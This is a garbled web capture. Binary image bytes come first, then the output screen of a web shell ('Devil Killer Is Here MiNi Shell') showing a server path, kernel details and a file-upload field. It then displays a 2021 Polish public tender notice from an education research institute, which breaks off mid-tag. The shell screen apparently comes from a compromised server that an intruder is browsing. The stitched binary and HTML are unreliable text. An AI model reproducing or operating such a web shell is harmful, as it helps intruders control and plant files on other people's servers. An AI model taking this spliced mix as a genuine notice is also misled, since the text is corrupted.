JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210521/0006116401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00061164 z dnia 2021-05-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie pilotażowych wdrożeń wybranych Sektorowych Ram Kwalifikacji w zakresie rozwoju kompetencji w podmiotach branżowych (II przetarg) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Badań Edukacyjnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000178235</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Górczewska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ibe.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.ibe.edu.pl/index.php/zamowienia-publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie pilotażowych wdrożeń wybranych Sektorowych Ram Kwalifikacji w zakresie rozwoju kompetencji w podmiotach branżowych (II przetarg) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3ee9de1c-ba0c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00061164</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Wspieranie funkcjonowania i doskonalenie ZSK na rzecz wykorzystania oferowanych w nim rozwiązań do realizacji celów strategii rozwoju kraju” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Wiedza, Edukacja, Rozwój </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.ibe.edu.pl/index.php/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">§9 Informacje o<br/>środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z<br/>wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania<br/>i odbierania korespondencji elektronicznej Skrócona instrukcja przygotowania i wysłania oferty z<br/>użyciem podpisuzaufanego.1. Skrócona instrukcja złożenia oferty w postępowaniu z użyciem podpisu<br/>zaufanego została opisana w pkt 2-5 poniżej. Wszystkie wymagania odnośnie korzystania z Miniportalu<br/>zostały zawarte w Instrukcji opublikowanej na stronie: https;//www.miniportal.uzp.gov.pl/Instrukcje2.<br/>Należy spakować wszystkie dokumenty składające się na ofertę. 3. Następnie, skompresowany plik<br/>należy podpisać podpisem zaufanym tj. z wykorzystaniem EPUAP-u na<br/>stronie:https://moj.gov.pl/nforms/signer/upload?xFormsAppName=SIGNERdalsze informacje i<br/>szczegóły sposobu komunikacji określono w §9 i §10 SWZ.https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zamówienia@ibe.edu.pl.7. Złożenie<br/>dokumentów na nośniku danych (np. CD,pendrive) jest niedopuszczalne.8. Wykonawca składa ofertę,<br/>dalej „oferta” za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na<br/>ePUAP i udostępnionego również na Miniportalu. Mechanizm szyfrowania jest udostępniony dla<br/>wykonawców na Miniportalu.9. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do formularzy: złożenia, zmiany,wycofania oferty lub wniosku oraz do formularza do<br/>komunikacji z Zamawiającym.10. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz<br/>Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula Informacyjna na temat uprawnień wynikających<br/>z rozporządzenia RODO znajduje się w załączniku nr 5 do SWZ oraz w załączniku nr 5 do umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula Informacyjna na temat uprawnień wynikających<br/>z rozporządzenia RODO znajduje się w załączniku nr 5 do SWZ oraz w załączniku nr 5 do umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IBE/16/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 429237,40 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczna części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest pilotażowe wdrożenie jednej z następujących SRK:<br/>Część 1. Handlu (SRKH) lub Energetyki (SRKE) lub Rolnictwa (SRK Rol) lub Zdrowia Publicznego (SRK ZP),<br/>Część 2. Sportu (SRKS) lub Usług Rozwojowych (SRK UR) lub Nieruchomości (SRKN),<br/>Wykonawca, w ramach każdej z części wybiera jedną SRK. Pilotaż w każdej ze wskazanych grup ram sektorowych jest osobną częścią zamówienia. <br/><br/>Wykonawca może złożyć ofertę tylko na jedną część niniejszego zamówienia. Jeżeli <br/>w wybranej ramie sektorowej wydzielono obszary znacznie różniące się kompetencjami (najczęściej jako tzw. podramy), Zamawiający dopuszcza możliwość wykorzystania jednego z nich.<br/><br/>Pilotaż wybranej SRK prowadzony będzie w obszarze rozwoju kompetencji w przynajmniej jednym podmiocie w Polsce w branży związanej z daną ramą sektorową. Zamawiający dopuszcza też pilotaż w części (dziale) instytucji, jeśli zakres pracy tego działu jest zgodny z wskazaną przez Wykonawcę SRK. Pilotaż odbędzie się dla pięciu stanowisk obejmujących łącznie w podmiocie objętym pilotażem przynajmniej 150 osób, lub alternatywnie pilotaż może być przeprowadzony w co najmniej 5 podmiotach, w każdym z nich co najmniej dla 2 stanowisk na których pracuje przynajmniej 5 osób.<br/><br/>Pilotaż ten ma na celu zidentyfikowanie realnych i potencjalnych korzyści oraz barier związanych z procesem implementacji SRK oraz zdobycie informacji pozwalających na skuteczne wykorzystanie SRK w kolejnych podmiotach w określonej branży w przyszłości. Kluczowe z punktu Zamawiającego jest by pilotaż dotyczył rzeczywistych działań związanych z rozwojem kompetencji i odpowiadał potrzebom podmiotów, w których będzie prowadzony. <br/><br/>Wykonawca jest zobowiązany wykorzystać sektorowe ramy kwalifikacji wypracowane we współpracy z Instytutem Badań Edukacyjnych (zob. rozdz. 6. OPZ – załącznik nr 7 do SWZ). <br/><br/>Niniejsze zamówienie jest realizowane w ramach projektu IBE „Wspieranie funkcjonowania <br/>i doskonalenie ZSK na rzecz wykorzystania oferowanych w nim rozwiązań do realizacji celów strategii rozwoju kraju” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Wiedza, Edukacja, Rozwój, Priorytet II: Efektywne polityki publiczne dla rynku pracy, gospodarki i edukacji, Działanie 2.13 Przejrzysty i spójny Krajowy System Kwalifikacji. <br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 214618,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79414000-9 - Usługi doradcze w zakresie zarządzania zasobami ludzkimi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79630000-9 - Usługi dotyczące personelu, z wyjątkiem rekrutacji i pozyskiwania personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">indywidualny<br/>1. Zamawiający najpierw dokonuje oceny ofert, a następnie zbada, czy wykonawca, którego<br/>oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu. W takim przypadku, w terminie nie krótszym niż 5 dni wezwie<br/>Wykonawcę, który przedstawił najkorzystniejszą ofertę do złożenia dokumentów<br/>potwierdzających spełnianie warunków udziału oraz niepodleganie wykluczeniu z postępowania.<br/>Art. 274 ustawy pzp stosuje się.2. W toku badania i oceny ofert Zamawiający może żądać od<br/>Wykonawców wyjaśnień dotyczących treści złożonych ofert.3. Zamawiający dokona poprawek w<br/>ofercie zgodnie z zapisami art. 223 ust. 2 ustawy.4. W przypadku rozbieżności pomiędzy ceną<br/>podaną przez Wykonawcę w ofercie wyrażoną słownie oraz cyfrowo za prawidłową<br/>Zamawiający uzna wartość (cenę) wyrażoną słownie z zastrzeżeniem art. 223 ust. 2 pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena zasadności wykorzystania SRK w podmiocie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">18,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena zasadności wybranych działań z proponowanej przez Zamawiającego w pkt 2.3 OPZ listy w stosunku do działalności i potrzeb podmiotu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">21,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Szczegółowy opis planowanych działań</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">21,00</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Harmonogram planowanych działań</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest pilotażowe wdrożenie jednej z następujących SRK:<br/>Część 1. Handlu (SRKH) lub Energetyki (SRKE) lub Rolnictwa (SRK Rol) lub Zdrowia Publicznego (SRK ZP),<br/>Część 2. Sportu (SRKS) lub Usług Rozwojowych (SRK UR) lub Nieruchomości (SRKN),<br/>Wykonawca, w ramach każdej z części wybiera jedną SRK. Pilotaż w każdej ze wskazanych grup ram sektorowych jest osobną częścią zamówienia. <br/><br/>Wykonawca może złożyć ofertę tylko na jedną część niniejszego zamówienia. Jeżeli <br/>w wybranej ramie sektorowej wydzielono obszary znacznie różniące się kompetencjami (najczęściej jako tzw. podramy), Zamawiający dopuszcza możliwość wykorzystania jednego z nich.<br/><br/>Pilotaż wybranej SRK prowadzony będzie w obszarze rozwoju kompetencji w przynajmniej jednym podmiocie w Polsce w branży związanej z daną ramą sektorową. Zamawiający dopuszcza też pilotaż w części (dziale) instytucji, jeśli zakres pracy tego działu jest zgodny z wskazaną przez Wykonawcę SRK. Pilotaż odbędzie się dla pięciu stanowisk obejmujących łącznie w podmiocie objętym pilotażem przynajmniej 150 osób, lub alternatywnie pilotaż może być przeprowadzony w co najmniej 5 podmiotach, w każdym z nich co najmniej dla 2 stanowisk na których pracuje przynajmniej 5 osób.<br/><br/>Pilotaż ten ma na celu zidentyfikowanie realnych i potencjalnych korzyści oraz barier związanych z procesem implementacji SRK oraz zdobycie informacji pozwalających na skuteczne wykorzystanie SRK w kolejnych podmiotach w określonej branży w przyszłości. Kluczowe z punktu Zamawiającego jest by pilotaż dotyczył rzeczywistych działań związanych z rozwojem kompetencji i odpowiadał potrzebom podmiotów, w których będzie prowadzony. <br/><br/>Wykonawca jest zobowiązany wykorzystać sektorowe ramy kwalifikacji wypracowane we współpracy z Instytutem Badań Edukacyjnych (zob. rozdz. 6. OPZ – załącznik nr 7 do SWZ). <br/><br/>Niniejsze zamówienie jest realizowane w ramach projektu IBE „Wspieranie funkcjonowania <br/>i doskonalenie ZSK na rzecz wykorzystania oferowanych w nim rozwiązań do realizacji celów strategii rozwoju kraju” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach programu Operacyjnego Wiedza, Edukacja, Rozwój, Priorytet II: Efektywne polityki publiczne dla rynku pracy, gospodarki i edukacji, Działanie 2.13 Przejrzysty i spójny Krajowy System Kwalifikacji. <br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 214618,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79414000-9 - Usługi doradcze w zakresie zarządzania zasobami ludzkimi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79630000-9 - Usługi dotyczące personelu, z wyjątkiem rekrutacji i pozyskiwania personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">indywidualny<br/>1. Zamawiający najpierw dokonuje oceny ofert, a następnie zbada, czy wykonawca, którego<br/>oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu. W takim przypadku, w terminie nie krótszym niż 5 dni wezwie<br/>Wykonawcę, który przedstawił najkorzystniejszą ofertę do złożenia dokumentów<br/>potwierdzających spełnianie warunków udziału oraz niepodleganie wykluczeniu z postępowania.<br/>Art. 274 ustawy pzp stosuje się.2. W toku badania i oceny ofert Zamawiający może żądać od<br/>Wykonawców wyjaśnień dotyczących treści złożonych ofert.3. Zamawiający dokona poprawek w<br/>ofercie zgodnie z zapisami art. 223 ust. 2 ustawy.4. W przypadku rozbieżności pomiędzy ceną<br/>podaną przez Wykonawcę w ofercie wyrażoną słownie oraz cyfrowo za prawidłową<br/>Zamawiający uzna wartość (cenę) wyrażoną słownie z zastrzeżeniem art. 223 ust. 2 pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena zasadności wykorzystania SRK w podmiocie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">18,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena zasadności wybranych działań z proponowanej przez Zamawiającego w pkt 2.3 OPZ listy w stosunku do działalności i potrzeb podmiotu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">21,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Szczegółowy opis planowanych działań</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">21,00</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Harmonogram planowanych działań</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span 